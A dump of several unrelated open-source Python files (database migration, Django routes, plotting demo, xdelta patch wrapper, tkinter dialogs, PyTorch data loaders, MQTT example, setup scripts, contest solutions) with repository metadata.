90b385ec49efbaee7e607516fc7d9f08991af813
|
[
"MIT"
] | 41 |
2019-11-28T16:58:41.000Z
|
2022-01-28T21:11:16.000Z
|
migrations/versions/0158_remove_rate_limit_default.py
|
cds-snc/notification-api
|
b1c1064f291eb860b494c3fa65ac256ad70bf47c
|
[
"MIT"
] | 1,083 |
2019-07-08T12:57:24.000Z
|
2022-03-08T18:53:40.000Z
|
migrations/versions/0158_remove_rate_limit_default.py
|
cds-snc/notifier-api
|
90b385ec49efbaee7e607516fc7d9f08991af813
|
[
"MIT"
] | 9 |
2020-01-24T19:56:43.000Z
|
2022-01-27T21:36:53.000Z
|
"""
Revision ID: 0158_remove_rate_limit_default
Revises: 0157_add_rate_limit_to_service
Create Date: 2018-01-09 14:33:08.313893
"""
import sqlalchemy as sa
from alembic import op
revision = "0158_remove_rate_limit_default"
down_revision = "0157_add_rate_limit_to_service"
def upgrade():
op.execute("ALTER TABLE services ALTER rate_limit DROP DEFAULT")
op.execute("ALTER TABLE services_history ALTER rate_limit DROP DEFAULT")
def downgrade():
op.execute("ALTER TABLE services ALTER rate_limit SET DEFAULT '3000'")
op.execute("ALTER TABLE services_history ALTER rate_limit SET DEFAULT '3000'")
| 26.73913 | 82 | 0.785366 | 93 | 615 | 4.924731 | 0.430108 | 0.157205 | 0.122271 | 0.165939 | 0.720524 | 0.558952 | 0.388646 | 0.388646 | 0.209607 | 0 | 0 | 0.082552 | 0.133333 | 615 | 22 | 83 | 27.954545 | 0.776735 | 0.2 | 0 | 0 | 0 | 0 | 0.59751 | 0.124481 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6ae016a3900fe6ed337451d458c99fc65e3be76f
| 888 |
py
|
Python
|
backend/core/api_urls.py
|
albeiks/omaralbeik.com
|
8d096130393919612863aac6280dffaf6e00961d
|
[
"MIT"
] | 10 |
2020-05-05T16:20:04.000Z
|
2021-07-22T15:15:13.000Z
|
backend/core/api_urls.py
|
albeiks/omaralbeik.com
|
8d096130393919612863aac6280dffaf6e00961d
|
[
"MIT"
] | null | null | null |
backend/core/api_urls.py
|
albeiks/omaralbeik.com
|
8d096130393919612863aac6280dffaf6e00961d
|
[
"MIT"
] | 1 |
2020-05-06T22:31:48.000Z
|
2020-05-06T22:31:48.000Z
|
from django.conf.urls import url, include
from core.routers import OptionalTrailingSlashRouter
from blog import views as blogViews
from snippets import views as snippetsViews
from projects import views as projectsViews
from tags import views as tagsViews
from contents import views as contentsViews
from contact import views as contactViews
router = OptionalTrailingSlashRouter()
router.register(r"blog", blogViews.PostViewSet)
router.register(r"snippets", snippetsViews.SnippetViewSet)
router.register(r"languages", snippetsViews.ProgrammingLanguageViewSet)
router.register(r"projects", projectsViews.ProjectViewSet)
router.register(r"tags", tagsViews.TagViewSet)
router.register(r"contents", contentsViews.ContentViewSet)
router.register(r"contact", contactViews.MessageViewSet)
# List or url patterns for the api subdomain
urlpatterns = [
url(r"^v2/", include(router.urls)),
]
| 35.52 | 71 | 0.824324 | 107 | 888 | 6.841122 | 0.411215 | 0.13388 | 0.143443 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001245 | 0.095721 | 888 | 24 | 72 | 37 | 0.910336 | 0.047297 | 0 | 0 | 0 | 0 | 0.061611 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.421053 | 0 | 0.421053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
0a77fdb1c15169709a632c8652ce9cffd62abd68
| 491 |
py
|
Python
|
jnpy/experiments/Qt/pyqtgraph_tutorial/codeloop_org_materials/c4_drawing_curves.py
|
jojoquant/jnpy
|
c874060af4b129ae09cee9f8542517b7b2f6573b
|
[
"MIT"
] | 5 |
2020-05-19T07:32:39.000Z
|
2022-03-14T09:09:48.000Z
|
jnpy/experiments/Qt/pyqtgraph_tutorial/codeloop_org_materials/c4_drawing_curves.py
|
jojoquant/jnpy
|
c874060af4b129ae09cee9f8542517b7b2f6573b
|
[
"MIT"
] | null | null | null |
jnpy/experiments/Qt/pyqtgraph_tutorial/codeloop_org_materials/c4_drawing_curves.py
|
jojoquant/jnpy
|
c874060af4b129ae09cee9f8542517b7b2f6573b
|
[
"MIT"
] | 3 |
2020-04-02T08:30:17.000Z
|
2020-05-03T12:12:05.000Z
|
# !/usr/bin/env python3
# -*- coding:utf-8 -*-
# @Datetime : 2019/11/14 上午2:26
# @Author : Fangyang
# @Software : PyCharm
import sys
from PyQt5.QtWidgets import QApplication
import pyqtgraph as pg
import numpy as np
app = QApplication(sys.argv)
x = np.arange(1000)
y = np.random.normal(size=(3, 1000))
plotWidget = pg.plot(title='Three plot curves')
for i in range(3):
plotWidget.plot(x, y[i], pen=(i, 3))
status = app.exec_()
sys.exit(status)
if __name__ == '__main__':
pass
| 19.64 | 47 | 0.678208 | 77 | 491 | 4.207792 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060976 | 0.164969 | 491 | 24 | 48 | 20.458333 | 0.729268 | 0.230143 | 0 | 0 | 0 | 0 | 0.067204 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.071429 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
0a7f1dd168a64e7f7f19d3324731c892ec275922
| 1,845 |
py
|
Python
|
patch.py
|
silverhikari/romtools
|
2a09290fef85f35502a95c5c2874317029f0439c
|
[
"Apache-2.0"
] | 5 |
2018-02-02T06:36:56.000Z
|
2020-12-21T20:17:20.000Z
|
patch.py
|
silverhikari/romtools
|
2a09290fef85f35502a95c5c2874317029f0439c
|
[
"Apache-2.0"
] | 8 |
2017-10-10T17:50:47.000Z
|
2021-06-02T00:02:58.000Z
|
patch.py
|
silverhikari/romtools
|
2a09290fef85f35502a95c5c2874317029f0439c
|
[
"Apache-2.0"
] | 2 |
2017-10-10T20:15:24.000Z
|
2021-12-17T04:50:16.000Z
|
"""
Utils for creating xdelta patches.
"""
import logging
from subprocess import check_output, CalledProcessError
from shutil import copyfile
from os import remove, path
class PatchChecksumError(Exception):
def __init__(self, message, errors):
super(PatchChecksumError, self).__init__(message)
class Patch:
# TODO: Abstract out the need for "edited" by just copying the original
# file.
def __init__(self, original, filename, edited=None, xdelta_dir='.'):
self.original = original
self.edited = edited
self.filename = filename
# Need to have this absolute path for xdelta3 to be found.
self.xdelta_path = path.join(xdelta_dir, 'xdelta3')
# self.xdelta_path = 'xdelta3'
def create(self):
if self.edited is None:
raise Exception
cmd = [
self.xdelta_path,
'-f',
'-s',
self.original,
self.edited,
self.filename,
]
print(cmd)
logging.info(cmd)
try:
check_output(cmd)
except CalledProcessError as e:
raise Exception(e.output)
def apply(self):
if not self.edited:
copyfile(self.original, self.original + "_temp")
self.edited = self.original
self.original = self.original + "_temp"
cmd = [
self.xdelta_path,
'-f',
'-d',
'-s',
self.original,
self.filename,
self.edited,
]
logging.info(cmd)
try:
check_output(cmd)
except CalledProcessError:
raise PatchChecksumError('Target file had incorrect checksum', [])
finally:
if self.original.endswith('_temp'):
remove(self.original)
| 27.132353 | 78 | 0.564228 | 190 | 1,845 | 5.352632 | 0.378947 | 0.129794 | 0.078663 | 0.070796 | 0.198623 | 0.108161 | 0.108161 | 0.108161 | 0.108161 | 0 | 0 | 0.002479 | 0.344173 | 1,845 | 67 | 79 | 27.537313 | 0.838017 | 0.106775 | 0 | 0.384615 | 0 | 0 | 0.040929 | 0 | 0 | 0 | 0 | 0.014925 | 0 | 1 | 0.076923 | false | 0 | 0.076923 | 0 | 0.192308 | 0.019231 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0a8741dde6ef103d06812289a7da5d5ee4748c1d
| 2,427 |
py
|
Python
|
src/tkdialog/dialog.py
|
KosukeMizuno/tkdialog
|
082fc106908bbbfa819d1a129929165f11d4e944
|
[
"MIT"
] | null | null | null |
src/tkdialog/dialog.py
|
KosukeMizuno/tkdialog
|
082fc106908bbbfa819d1a129929165f11d4e944
|
[
"MIT"
] | null | null | null |
src/tkdialog/dialog.py
|
KosukeMizuno/tkdialog
|
082fc106908bbbfa819d1a129929165f11d4e944
|
[
"MIT"
] | null | null | null |
from pathlib import Path
import pickle
import tkinter as tk
import tkinter.filedialog
def open_dialog(**opt):
"""Parameters
----------
Options will be passed to `tkinter.filedialog.askopenfilename`.
See also tkinter's document.
Followings are example of frequently used options.
- filetypes=[(label, ext), ...]
- label: str
- ext: str, semicolon separated extentions
- initialdir: str, default Path.cwd()
- multiple: bool, default False
Returns
--------
filename, str
"""
root = tk.Tk()
root.withdraw()
root.wm_attributes("-topmost", True)
opt_default = dict(initialdir=Path.cwd())
_opt = dict(opt_default, **opt)
return tk.filedialog.askopenfilename(**_opt)
def saveas_dialog(**opt):
"""Parameters
----------
Options will be passed to `tkinter.filedialog.asksaveasfilename`.
See also tkinter's document.
Followings are example of frequently used options.
- filetypes=[(label, ext), ...]
- label: str
- ext: str, semicolon separated extentions
- initialdir: str, default Path.cwd()
- initialfile: str, default isn't set
Returns
--------
filename, str
"""
root = tk.Tk()
root.withdraw()
root.wm_attributes("-topmost", True)
opt_default = dict(initialdir=Path.cwd())
_opt = dict(opt_default, **opt)
return tk.filedialog.asksaveasfilename(**_opt)
def load_pickle_with_dialog(mode='rb', **opt):
"""Load a pickled object with a filename assigned by tkinter's open dialog.
kwargs will be passed to saveas_dialog.
"""
opt_default = dict(filetypes=[('pickled data', '*.pkl'), ('all', '*')])
_opt = dict(opt_default, **opt)
fn = open_dialog(**_opt)
if fn == '': # canceled
return None
with Path(fn).open(mode) as f:
data = pickle.load(f)
return data
def dump_pickle_with_dialog(obj, mode='wb', **opt):
"""Pickle an object with a filename assigned by tkinter's saveas dialog.
kwargs will be passed to saveas_dialog.
Returns
--------
filename: str
"""
opt_default = dict(filetypes=[('pickled data', '*.pkl'), ('all', '*')])
_opt = dict(opt_default, **opt)
fn = saveas_dialog(**_opt)
if fn == '': # canceled
return ''
# note: 上書き確認はtkinterがやってくれるのでここではチェックしない
with Path(fn).open(mode) as f:
pickle.dump(obj, f)
return fn
| 25.547368 | 79 | 0.622167 | 291 | 2,427 | 5.085911 | 0.285223 | 0.054054 | 0.032432 | 0.037838 | 0.713514 | 0.713514 | 0.677027 | 0.648649 | 0.547297 | 0.547297 | 0 | 0 | 0.23527 | 2,427 | 94 | 80 | 25.819149 | 0.797414 | 0.433045 | 0 | 0.5 | 0 | 0 | 0.050945 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.388889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0a89d9e3455e77e62d24b044c32fc90cbc464fc1
| 368 |
py
|
Python
|
setup.py
|
SilicalNZ/canvas
|
44d1eee02c334aae6b41aeba01ed0ecdf83aed21
|
[
"MIT"
] | 7 |
2019-08-04T20:37:55.000Z
|
2020-03-05T08:36:10.000Z
|
setup.py
|
SilicalNZ/canvas
|
44d1eee02c334aae6b41aeba01ed0ecdf83aed21
|
[
"MIT"
] | 1 |
2019-10-21T05:43:28.000Z
|
2019-10-21T05:43:28.000Z
|
setup.py
|
SilicalNZ/canvas
|
44d1eee02c334aae6b41aeba01ed0ecdf83aed21
|
[
"MIT"
] | null | null | null |
import setuptools
setuptools.setup(
name = 'sili-canvas',
version = '0.0.1',
license = 'MIT',
url = 'https://github.com/SilicalNZ/canvas',
description = 'A series of easy to use classes to perform complex 2D array transformations',
long_description = '',
author = 'SilicalNZ',
packages = ['canvas', 'canvas.common', 'canvas.tools']
)
| 26.285714 | 96 | 0.649457 | 43 | 368 | 5.534884 | 0.790698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013699 | 0.206522 | 368 | 13 | 97 | 28.307692 | 0.80137 | 0 | 0 | 0 | 0 | 0 | 0.459239 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0a8b4fc2b42148f674fa2146ee9800ea9e96f927
| 2,614 |
py
|
Python
|
surname_rnn/surname/containers.py
|
sudarshan85/nlpbook
|
41e59d706fb31f5185a0133789639ccffbddb41f
|
[
"Apache-2.0"
] | null | null | null |
surname_rnn/surname/containers.py
|
sudarshan85/nlpbook
|
41e59d706fb31f5185a0133789639ccffbddb41f
|
[
"Apache-2.0"
] | null | null | null |
surname_rnn/surname/containers.py
|
sudarshan85/nlpbook
|
41e59d706fb31f5185a0133789639ccffbddb41f
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import pandas as pd
from pathlib import Path
from torch.utils.data import DataLoader
class ModelContainer(object):
def __init__(self, model, optimizer, loss_fn, scheduler=None):
self.model = model
self.optimizer = optimizer
self.loss_fn = loss_fn
self.scheduler = scheduler
class DataContainer(object):
def __init__(self, df_with_split: pd.DataFrame, dataset_class, vectorizer_file: Path, batch_size:
int, with_test=True, is_load: bool=True) -> None:
self.train_df = df_with_split.loc[df_with_split['split'] == 'train']
self.val_df = df_with_split.loc[df_with_split['split'] == 'val']
self._bs = batch_size
self.with_test = with_test
self.is_load = is_load
self._lengths = {'train_size': len(self.train_df), 'val_size': len(self.val_df)}
self._n_batches = [self._lengths['train_size'] // self._bs, self._lengths['val_size'] //
self._bs]
if not self.is_load:
print("Creating and saving vectorizer")
train_ds = dataset_class.load_data_and_create_vectorizer(self.train_df)
train_ds.save_vectorizer(vectorizer_file)
self.train_ds = dataset_class.load_data_and_vectorizer_from_file(self.train_df, vectorizer_file)
self.vectorizer = self.train_ds.vectorizer
self.surname_vocab = self.vectorizer.surname_vocab
self.nationality_vocab = self.vectorizer.nationality_vocab
self.train_dl = DataLoader(self.train_ds, self._bs, shuffle=True, drop_last=True)
self.val_ds = dataset_class.load_data_and_vectorizer(self.val_df, self.vectorizer)
self.val_dl = DataLoader(self.val_ds, self._bs, shuffle=True, drop_last=True)
if self.with_test:
self.test_df = df_with_split.loc[df_with_split['split'] == 'test']
self._lengths['test_size'] = len(self.test_df)
self._n_batches.append(self._lengths['test_size'] // self._bs)
self.test_ds = dataset_class.load_data_and_vectorizer(self.test_df, self.vectorizer)
self.test_dl = DataLoader(self.test_ds, self._bs, shuffle=True, drop_last=True)
def get_loaders(self):
return self.train_dl, self.val_dl, self.test_dl
@property
def train_batches(self):
return self._n_batches[0]
@property
def val_batches(self):
return self._n_batches[1]
@property
def test_batches(self):
if not self.with_test:
raise NameError("No test dataset was provided")
return self._n_batches[2]
@property
def vocab_size(self):
return len(self.surname_vocab)
@property
def n_classes(self):
return len(self.nationality_vocab)
@property
def sizes(self):
return self._lengths
| 33.512821 | 100 | 0.729533 | 389 | 2,614 | 4.570694 | 0.210797 | 0.045557 | 0.043307 | 0.040495 | 0.22216 | 0.22216 | 0.189539 | 0.150169 | 0.053993 | 0 | 0 | 0.001366 | 0.159908 | 2,614 | 77 | 101 | 33.948052 | 0.808288 | 0.007651 | 0 | 0.101695 | 0 | 0 | 0.053627 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.152542 | false | 0 | 0.050847 | 0.101695 | 0.355932 | 0.016949 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 |
0
| 1 |
0a95cfa206f2acf8636e2a3399ef4362d43aa15a
| 3,092 |
py
|
Python
|
pybm/commands/compare.py
|
nicholasjng/pybm
|
13e256ca5c2c8239f9d611b9849dab92f70b2834
|
[
"Apache-2.0"
] | 12 |
2021-10-10T20:00:07.000Z
|
2022-02-09T11:29:07.000Z
|
pybm/commands/compare.py
|
nicholasjng/pybm
|
13e256ca5c2c8239f9d611b9849dab92f70b2834
|
[
"Apache-2.0"
] | 20 |
2021-10-13T09:37:20.000Z
|
2022-03-07T15:14:00.000Z
|
pybm/commands/compare.py
|
nicholasjng/pybm
|
13e256ca5c2c8239f9d611b9849dab92f70b2834
|
[
"Apache-2.0"
] | 1 |
2022-02-09T10:09:41.000Z
|
2022-02-09T10:09:41.000Z
|
from typing import List
from pybm import PybmConfig
from pybm.command import CLICommand
from pybm.config import get_reporter_class
from pybm.exceptions import PybmError
from pybm.reporters import BaseReporter
from pybm.status_codes import ERROR, SUCCESS
from pybm.util.path import get_subdirs
class CompareCommand(CLICommand):
"""
Report benchmark results from specified sources.
"""
usage = "pybm compare <run> <anchor-ref> <compare-refs> [<options>]\n"
def __init__(self):
super(CompareCommand, self).__init__(name="compare")
self.config = PybmConfig.load()
def add_arguments(self):
self.parser.add_argument(
"run",
type=str,
metavar="<run>",
help="Benchmark run to report results for. "
"To report the preceding run, use the "
'"latest" keyword. To report results '
"of the n-th preceding run "
"(i.e., n runs ago), "
'use the "latest^{n}" syntax.',
)
self.parser.add_argument(
"refs",
nargs="+",
metavar="<refs>",
help="Benchmarked refs to compare. The first "
"given ref will be treated as the "
"anchor ref, relative to which all "
"differences are reported. An error is "
"raised if any of the given "
"refs are not present in the run.",
)
reporter: BaseReporter = get_reporter_class(config=self.config)
reporter_args = reporter.additional_arguments()
if reporter_args:
reporter_name = self.config.get_value("reporter.name")
reporter_group_desc = (
f"Additional options from configured reporter class {reporter_name!r}"
)
reporter_group = self.parser.add_argument_group(reporter_group_desc)
# add builder-specific options into the group
for arg in reporter_args:
reporter_group.add_argument(arg.pop("flags"), **arg)
def run(self, args: List[str]) -> int:
if not args:
self.parser.print_help()
return ERROR
self.add_arguments()
options = self.parser.parse_args(args)
reporter: BaseReporter = get_reporter_class(config=self.config)
# TODO: Parse run to fit schema
run = options.run
refs: List[str] = options.refs
result_dir = reporter.result_dir
# TODO: Make this dynamic to support other run identifiers
result = sorted(get_subdirs(result_dir))[-1]
result_path = result_dir / result
if result_path.exists():
reporter.compare(
*refs,
result=result,
target_filter=options.target_filter,
benchmark_filter=options.benchmark_filter,
context_filter=options.context_filter,
)
else:
raise PybmError(
f"No benchmark results found for the requested run {run!r}."
)
return SUCCESS
| 32.893617 | 86 | 0.597025 | 351 | 3,092 | 5.11396 | 0.361823 | 0.031198 | 0.026741 | 0.035097 | 0.057939 | 0.057939 | 0.057939 | 0.057939 | 0 | 0 | 0 | 0.000474 | 0.317917 | 3,092 | 93 | 87 | 33.247312 | 0.85064 | 0.058215 | 0 | 0.056338 | 0 | 0 | 0.212509 | 0 | 0 | 0 | 0 | 0.010753 | 0 | 1 | 0.042254 | false | 0 | 0.112676 | 0 | 0.211268 | 0.014085 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0a96a8a9570ed3b24a4bfee94944da9262d1bde3
| 449 |
py
|
Python
|
setup.py
|
nopipifish/bert4keras
|
d8fd065b9b74b8a82b381b7183f9934422e4caa9
|
[
"Apache-2.0"
] | 1 |
2020-09-09T02:34:28.000Z
|
2020-09-09T02:34:28.000Z
|
setup.py
|
nopipifish/bert4keras
|
d8fd065b9b74b8a82b381b7183f9934422e4caa9
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
nopipifish/bert4keras
|
d8fd065b9b74b8a82b381b7183f9934422e4caa9
|
[
"Apache-2.0"
] | null | null | null |
#! -*- coding: utf-8 -*-
from setuptools import setup, find_packages
setup(
name='bert4keras',
version='0.8.4',
description='an elegant bert4keras',
long_description='bert4keras: https://github.com/bojone/bert4keras',
license='Apache License 2.0',
url='https://github.com/bojone/bert4keras',
author='bojone',
author_email='bojone@spaces.ac.cn',
install_requires=['keras<=2.3.1'],
packages=find_packages()
)
| 26.411765 | 72 | 0.674833 | 56 | 449 | 5.321429 | 0.642857 | 0.080537 | 0.09396 | 0.134228 | 0.201342 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036842 | 0.153675 | 449 | 16 | 73 | 28.0625 | 0.747368 | 0.051225 | 0 | 0 | 0 | 0 | 0.411765 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.076923 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0a98cfd9f20dfc0c1b38e64c743a29230c7a8c4f
| 195 |
py
|
Python
|
whoPay.py
|
susurigirl/susuri
|
cec96cc9abd5a25762e15db27c17e70a95ae874c
|
[
"MIT"
] | null | null | null |
whoPay.py
|
susurigirl/susuri
|
cec96cc9abd5a25762e15db27c17e70a95ae874c
|
[
"MIT"
] | null | null | null |
whoPay.py
|
susurigirl/susuri
|
cec96cc9abd5a25762e15db27c17e70a95ae874c
|
[
"MIT"
] | null | null | null |
import random
names_string = input("내기를 할 친구들의 이름을 적습니다. 콤마(,)로 분리해서 적습니다.\n")
names = names_string.split(",")
print(names)
n = random.randint(0, len(names))
print(f"오늘 커피는 {names[n]}가 쏩니다!")
| 19.5 | 64 | 0.676923 | 35 | 195 | 3.714286 | 0.685714 | 0.169231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005952 | 0.138462 | 195 | 9 | 65 | 21.666667 | 0.767857 | 0 | 0 | 0 | 0 | 0 | 0.328205 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0a99a93e656914b21bfd27861c1447d786a91bee
| 2,929 |
py
|
Python
|
MicroPython_BUILD/components/micropython/esp32/modules_examples/mqtt_example.py
|
FlorianPoot/MicroPython_ESP32_psRAM_LoBo
|
fff2e193d064effe36a7d456050faa78fe6280a8
|
[
"Apache-2.0"
] | 838 |
2017-07-14T10:08:13.000Z
|
2022-03-22T22:09:14.000Z
|
MicroPython_BUILD/components/micropython/esp32/modules_examples/mqtt_example.py
|
FlorianPoot/MicroPython_ESP32_psRAM_LoBo
|
fff2e193d064effe36a7d456050faa78fe6280a8
|
[
"Apache-2.0"
] | 395 |
2017-08-18T15:56:17.000Z
|
2022-03-20T11:28:23.000Z
|
MicroPython_BUILD/components/micropython/esp32/modules_examples/mqtt_example.py
|
FlorianPoot/MicroPython_ESP32_psRAM_LoBo
|
fff2e193d064effe36a7d456050faa78fe6280a8
|
[
"Apache-2.0"
] | 349 |
2017-09-02T18:00:23.000Z
|
2022-03-31T23:26:22.000Z
|
import network
def conncb(task):
print("[{}] Connected".format(task))
def disconncb(task):
print("[{}] Disconnected".format(task))
def subscb(task):
print("[{}] Subscribed".format(task))
def pubcb(pub):
print("[{}] Published: {}".format(pub[0], pub[1]))
def datacb(msg):
print("[{}] Data arrived from topic: {}, Message:\n".format(msg[0], msg[1]), msg[2])
mqtt = network.mqtt("loboris", "mqtt://loboris.eu", user="wifimcu", password="wifimculobo", cleansession=True, connected_cb=conncb, disconnected_cb=disconncb, subscribed_cb=subscb, published_cb=pubcb, data_cb=datacb)
# secure connection requires more memory and may not work
# mqtts = network.mqtt("eclipse", "mqtts//iot.eclipse.org", cleansession=True, connected_cb=conncb, disconnected_cb=disconncb, subscribed_cb=subscb, published_cb=pubcb, data_cb=datacb)
# wsmqtt = network.mqtt("eclipse", "ws://iot.eclipse.org:80/ws", cleansession=True, data_cb=datacb)
mqtt.start()
#mqtt.config(lwt_topic='status', lwt_msg='Disconected')
'''
# Wait until status is: (1, 'Connected')
mqtt.subscribe('test')
mqtt.publish('test', 'Hi from Micropython')
mqtt.stop()
'''
# ==================
# ThingSpeak example
# ==================
import network
def datacb(msg):
print("[{}] Data arrived from topic: {}, Message:\n".format(msg[0], msg[1]), msg[2])
thing = network.mqtt("thingspeak", "mqtt://mqtt.thingspeak.com", user="anyName", password="ThingSpeakMQTTid", cleansession=True, data_cb=datacb)
# or secure connection
#thing = network.mqtt("thingspeak", "mqtts://mqtt.thingspeak.com", user="anyName", password="ThingSpeakMQTTid", cleansession=True, data_cb=datacb)
thingspeakChannelId = "123456" # enter Thingspeak Channel ID
thingspeakChannelWriteApiKey = "ThingspeakWriteAPIKey" # EDIT - enter Thingspeak Write API Key
thingspeakFieldNo = 1
thingSpeakChanelFormat = "json"
pubchan = "channels/{:s}/publish/{:s}".format(thingspeakChannelId, thingspeakChannelWriteApiKey)
pubfield = "channels/{:s}/publish/fields/field{}/{:s}".format(thingspeakChannelId, thingspeakFieldNo, thingspeakChannelWriteApiKey)
subchan = "channels/{:s}/subscribe/{:s}/{:s}".format(thingspeakChannelId, thingSpeakChanelFormat, thingspeakChannelWriteApiKey)
subfield = "channels/{:s}/subscribe/fields/field{}/{:s}".format(thingspeakChannelId, thingspeakFieldNo, thingspeakChannelWriteApiKey)
thing.start()
tmo = 0
while thing.status()[0] != 2:
utime.sleep_ms(100)
tmo += 1
if tmo > 80:
print("Not connected")
break
# subscribe to channel
thing.subscribe(subchan)
# subscribe to field
thing.subscribe(subfield)
# publish to channel
# Payload can include any of those fields separated b< ';':
# "field1=value;field2=value;...;field8=value;latitude=value;longitude=value;elevation=value;status=value"
thing.publish(pubchan, "field1=25.2;status=On line")
# Publish to field
thing.publish(pubfield, "24.5")
| 33.284091 | 216 | 0.712188 | 347 | 2,929 | 5.965418 | 0.357349 | 0.02657 | 0.028986 | 0.031884 | 0.329469 | 0.315942 | 0.315942 | 0.236715 | 0.236715 | 0.236715 | 0 | 0.01428 | 0.115398 | 2,929 | 87 | 217 | 33.666667 | 0.784639 | 0.313418 | 0 | 0.162162 | 0 | 0 | 0.252552 | 0.11338 | 0 | 0 | 0 | 0 | 0 | 1 | 0.162162 | false | 0.054054 | 0.054054 | 0 | 0.216216 | 0.189189 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
0a9deb518dd12c6a3961ce613b76fcc3db2acd68
| 602 |
py
|
Python
|
algorithm_training/abc87.py
|
hirotosuzuki/algorithm_training
|
3134bad4ea2ea57a77e05be6f21ba776a558f520
|
[
"MIT"
] | null | null | null |
algorithm_training/abc87.py
|
hirotosuzuki/algorithm_training
|
3134bad4ea2ea57a77e05be6f21ba776a558f520
|
[
"MIT"
] | null | null | null |
algorithm_training/abc87.py
|
hirotosuzuki/algorithm_training
|
3134bad4ea2ea57a77e05be6f21ba776a558f520
|
[
"MIT"
] | null | null | null |
class TaskA:
def run(self):
V, A, B, C = map(int, input().split())
pass
class TaskB:
def run(self):
A = int(input())
B = int(input())
C = int(input())
X = int(input())
counter = 0
for a in range(A+1):
for b in range(B+1):
for c in range(C+1):
total = 500 * a + 100 * b + 50 * c
if total == X:
counter += 1
print(counter)
class TaskC:
def run(self):
pass
if __name__ == "__main__":
task = TaskB()
task.run()
